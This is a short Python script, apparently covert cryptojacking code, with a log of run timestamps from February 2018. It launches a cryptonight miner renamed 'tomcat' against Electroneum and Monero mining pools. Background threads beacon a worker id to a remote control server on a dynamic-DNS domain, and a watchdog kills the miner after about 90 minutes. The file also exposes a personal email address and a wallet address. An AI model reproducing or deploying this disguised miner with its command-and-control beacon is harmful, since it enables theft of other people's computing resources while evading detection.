import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:05.922350
#2018-02-17 16:35:07.133455
#2018-02-17 18:23:01.585044
#2018-02-17 20:11:03.464407
#2018-02-17 21:59:04.475265
#2018-02-17 23:43:03.770371
#2018-02-18 01:35:04.171095
#2018-02-18 03:21:07.192877
#2018-02-18 05:09:01.831983
#2018-02-18 07:01:07.261261
#2018-02-18 08:50:07.355821
#2018-02-18 10:37:04.010615
#2018-02-18 12:22:06.845527
#2018-02-18 14:09:07.435046
#2018-02-18 15:59:05.767205
#2018-02-18 17:49:06.746867
#2018-02-18 19:35:08.614700
#2018-02-18 21:20:05.732884
#2018-02-18 23:07:06.801918
#2018-02-19 00:54:05.140378
#2018-02-19 02:40:08.820751
#2018-02-19 04:27:02.005024
#2018-02-19 06:14:01.694829
#2018-02-19 08:02:05.097934
#2018-02-19 09:52:01.770846
#2018-02-19 11:40:08.074572
#2018-02-19 13:28:06.904644
#2018-02-19 15:18:05.113915
#2018-02-19 17:06:07.963804
#2018-02-19 18:53:03.957173
#2018-02-19 20:42:04.002224
#2018-02-19 22:28:06.144177
#2018-02-20 00:15:09.652008
#2018-02-20 02:04:05.466046
#2018-02-20 03:54:03.298343
#2018-02-20 05:38:06.567070
#2018-02-20 07:23:06.931656
#2018-02-20 09:08:05.627844
#2018-02-20 10:51:06.549853
#2018-02-20 12:38:06.540518
#2018-02-20 14:23:07.985643
#2018-02-20 16:08:07.063600
#2018-02-20 17:55:06.233339
#2018-02-20 19:45:13.590583
#2018-02-20 21:34:06.688183
#2018-02-20 23:16:06.117408
#2018-02-21 01:00:08.536750
#2018-02-21 02:47:06.692133
#2018-02-21 04:36:01.256189
#2018-02-21 06:24:07.052264
#2018-02-21 08:09:07.426383
#2018-02-21 09:56:01.879592
#2018-02-21 11:44:10.442260
#2018-02-21 13:36:08.224005
#2018-02-21 15:20:07.018205
#2018-02-21 17:11:01.911678
#2018-02-21 18:58:04.053450
#2018-02-21 20:42:01.711863
#2018-02-21 22:27:01.709965
#2018-02-22 00:16:07.781683
#2018-02-22 02:05:09.425857
#2018-02-22 03:51:02.212270
#2018-02-22 05:37:07.510677
#2018-02-22 07:23:06.664499
#2018-02-22 09:10:06.556764
#2018-02-22 10:57:10.345796
#2018-02-22 12:42:04.204226
#2018-02-22 14:27:07.407744
#2018-02-22 16:13:04.542439
#2018-02-22 17:58:08.963554
#2018-02-22 19:47:07.380763
#2018-02-22 21:37:05.679394
#2018-02-22 23:25:09.336415
#2018-02-23 01:13:04.261786
#2018-02-23 03:02:06.476207
#2018-02-23 04:51:01.232627
#2018-02-23 06:30:04.776423
#2018-02-23 08:17:03.872441
#2018-02-23 10:34:04.757674
#2018-02-23 12:27:01.263248
#2018-02-23 14:14:05.102753
#2018-02-23 16:03:09.029973
#2018-02-23 17:48:06.474280
#2018-02-23 19:34:05.687346
#2018-02-23 21:17:05.060279
#2018-02-23 23:04:07.006015
#2018-02-24 00:52:06.676369
#2018-02-24 02:48:01.574216
#2018-02-24 05:27:07.295036
#2018-02-24 07:14:03.919023
#2018-02-24 09:04:04.313535
#2018-02-24 11:03:06.370550
#2018-02-24 12:51:06.826140
#2018-02-24 14:39:01.902522
#2018-02-24 16:28:01.940955
#2018-02-24 18:19:06.348235
#2018-02-24 20:05:06.335793
#2018-02-24 21:47:05.767354
#2018-02-25 00:47:05.791247
#2018-02-25 04:36:07.929412
#2018-02-25 08:02:04.123706